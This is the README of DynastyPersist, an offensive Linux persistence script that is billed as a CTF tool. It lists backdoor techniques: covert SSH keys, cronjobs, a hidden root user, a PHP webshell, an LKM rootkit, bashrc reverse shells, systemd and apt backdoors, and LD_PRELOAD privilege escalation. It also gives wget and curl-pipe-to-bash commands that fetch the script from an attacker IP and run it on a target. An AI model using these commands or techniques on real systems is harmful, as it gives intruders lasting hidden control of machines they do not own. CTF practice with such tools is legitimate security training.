DynastyPersist: A Linux persistence tool

DynastyPersist

A CTF Tool for Linux persistence (KOTH, Battlegrounds)

A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.

Linux persistence tool

Features

  1. SSH Key Generation: Automatically generates SSH keys for covert access.

  2. Cronjob Persistence: Sets up cronjobs for scheduled persistence.

  3. Custom User with Root: Creates a custom user with root privileges.

  4. RCE Persistence: Achieves persistence through remote code execution (php webshell).

  5. LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence.

  6. Bashrc Persistence: Modifies user-specific shell initialization files for persistence (aliases / reverse shells).

  7. Systemd Service for Root: Sets up a systemd service for achieving root persistence.

  8. LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation.

  9. Backdooring Message of the Day / Header: Backdoors system message display for covert access.

  10. Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence.

  11. Backdoors APT Command: Backdoors apt command to pop up a shell.

Installation

  1. Clone this repository to your local machine:

$ git clone https://github.com/Trevohack/DynastyPersist.git
$ python3 -m http.server 8080
root@tyler.thm~$ cd /opt && wget -c [ATTACKER-IP]:8080/DynastyPersist && cd DynastyPersist && chmod +x dynasty.sh && ./dynasty.sh <ATTACKER_IP> <PORT>

  1. One linear

curl -sSL [ATTACKER_IP]:8080/DynastyPersist/dynasty.sh <ATTACKER_IP> <PORT> | bash

Copyright (C) 2024

Source: https://github.com/Trevohack/